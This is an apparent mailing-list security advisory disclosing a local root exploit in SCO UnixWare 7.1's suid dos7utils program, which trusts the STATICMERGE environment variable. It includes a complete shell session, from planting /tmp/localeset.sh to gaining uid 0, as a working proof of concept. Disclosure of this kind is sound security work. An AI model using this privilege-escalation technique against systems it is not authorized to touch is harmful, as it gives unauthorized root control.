SCO UnixWare 7.1 local root exploit

[btellier () USA NET (Brock Tellier)]

Greetings,

A vulnerability exists in the /usr/lib/merge/dos7utils program (suid root by
default) which allows any user to execute any command as root.  The dos7utils
program gets its localeset.sh exec path from the environment variable
STATICMERGE.  By setting this to a directory writable by us and setting the -f
switch, we can have dos7utils run our program as follows:

bash-2.02$ uname -a; id; pwd
UnixWare fear71 5 7.1.0 i386 x86at SCO UNIX_SVR5
uid=101(xnec) gid=1(other)
/usr/lib/merge
bash-2.02$ export STATICMERGE=/tmp
bash-2.02$ cat > /tmp/localeset.sh
#!/bin/sh
id
bash-2.02$ chmod 700 /tmp/localeset.sh 
bash-2.02$ ./dos7utils -f bah
uid=0(root) gid=1(other)
groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit),10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp)
bash-2.02$ 
----

Searching through the securityfocus vulnerability archives yields 0 matches
for search string "unixware", but several for "openserver".  I thought this
was rather strange, considering that SCO is discontinuing OpenServer after
5.0.5 in favor of the much more reliable (though not security-wise, evidently)
UnixWare 7.  And so begins my audit of the virgin Unixware 7 so soon after my
incomplete audit of SCO 5.0.5.

Brock Tellier
UNIX Systems Administrator

____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1